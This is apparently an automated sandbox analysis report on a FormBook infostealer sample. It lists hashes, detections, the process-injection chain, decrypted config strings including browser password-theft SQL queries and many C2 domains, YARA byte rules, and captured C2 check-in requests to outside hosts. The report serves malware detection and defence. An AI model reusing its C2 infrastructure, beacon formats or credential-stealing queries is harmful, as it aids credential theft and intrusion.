Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report RRW9901200241.exe

Overview

General Information

Sample Name:RRW9901200241.exe
Analysis ID:339369
MD5:61ffb4ad4721f51413075923b2e9468d
SHA1:aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
SHA256:546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RRW9901200241.exe (PID: 3016 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
    • RRW9901200241.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6556 cmdline: /c del 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "grayfoxden.com", "drupadhyayashomoeopathy.com", "coordinatedcare-ok.com", "the-legend-update3.com", "remoteworkoffer.com", "r3dprojects.com", "banhuaihangschool.com", "7852bigbucktrail.info", "villagepizzafloralpark.com", "sgtradingusa.com", "evolvestephanieperreault.com", "timelessbeautylessons.com", "monkeytrivia.com", "bsf.xyz", "canda.design", "recetasnutribullet.com", "olenfex.com", "catatan-matematika.com", "roeltecnologiadigital.com", "jutoxnatural.com", "euroticie.info", "tmxinc-chemicals.com", "futurehawick.com", "xaxzwz.com", "kitfal.com", "mickey2nd.com", "world10plus.com", "harkinstheates.com", "conceptpowder.com", "aeshahcosmetics.com", "netglog.net", "mystery-enigma.net", "packerssandmover.online", "weinsurehumans.com", "estrade-monschau.com", "poinintiteknologi.com", "zipdelta.com", "thibau4.xyz", "immobiliervaldoingt.com", "superherospirit.com", "c-vital33.com", "dydongyuan.com", "glamatomy.com", "campingpt.com", "wozhebank.com", "citestaccnt1597754710.com", "localcryptod.com", "celinemnique.com", "broderies-admc.com", "watdomenrendi03.net", "dehaochu.com", "missbeehavn.com", "ryangyoung.com", "kcspantry.com", "posdonanim.com", "directtestingservice.com", "toastxpress.com", "kingdommarketinguniversity.com", "quantumtoday.xyz", "modernhomespa.com", "peakeventsservices.com", "dellvn.net", "maryjoyllc.com", "trentog.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitvn.com/krc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.RRW9901200241.exe.1a00000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RRW9901200241.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RRW9901200241.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: RRW9901200241.exeAvira: detected
          Antivirus detection for URL or domainShow sources
          Source: http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RRW9901200241.exeJoe Sandbox ML: detected
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.RRW9901200241.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 4x nop then pop edi2_2_00417D6E

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: SUPERDATA-AS-VNSUPERDATA-VN SUPERDATA-AS-VNSUPERDATA-VN
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.7852bigbucktrail.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Jan 2021 20:49:10 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 